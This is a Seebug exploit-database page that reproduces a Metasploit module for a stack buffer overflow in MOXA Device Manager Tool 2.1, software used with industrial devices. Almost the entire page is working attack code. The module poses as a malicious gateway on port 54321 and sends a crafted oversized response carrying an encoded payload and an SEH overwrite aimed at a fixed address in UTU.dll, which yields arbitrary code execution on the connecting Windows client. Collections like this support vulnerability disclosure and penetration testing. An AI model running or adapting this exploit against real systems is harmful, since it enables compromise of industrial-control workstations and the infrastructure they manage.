Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:70898
HistoryJul 01, 2014 - 12:00 a.m.

MOXA Device Manager Tool 2.1 - Buffer Overflow

2014-07-0100:00:00
Root
www.seebug.org
17
JSON

No description provided by source.


                                                ##
# $Id: moxa_mdmtool.rb 11039 2010-11-14 19:03:24Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote

	Rank = GreatRanking

	include Msf::Exploit::Remote::TcpServer
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
				When sending a specially crafted MDMGw (MDM2_Gateway) response, an
				attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'Ruben Santamarta', 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11039 $',
			'References'     =>
				[
					[ 'OSVDB', '69027'],
					[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
					[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Oct 20 2010',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
			], self.class)
	end

	def on_client_connect(client)

		return if ((p = regenerate_payload(client)) == nil)

		client.get_once

		sploit = rand_text_alpha_upper(18024)

		sploit[0, 4] = [0x29001028].pack('V')
		sploit[472, payload.encoded.length] = payload.encoded
		sploit[1072, 8] = generate_seh_record(target.ret)
		sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string

		client.put(sploit)

		handler(client)

		service.close_client(client)

	end
end
JSON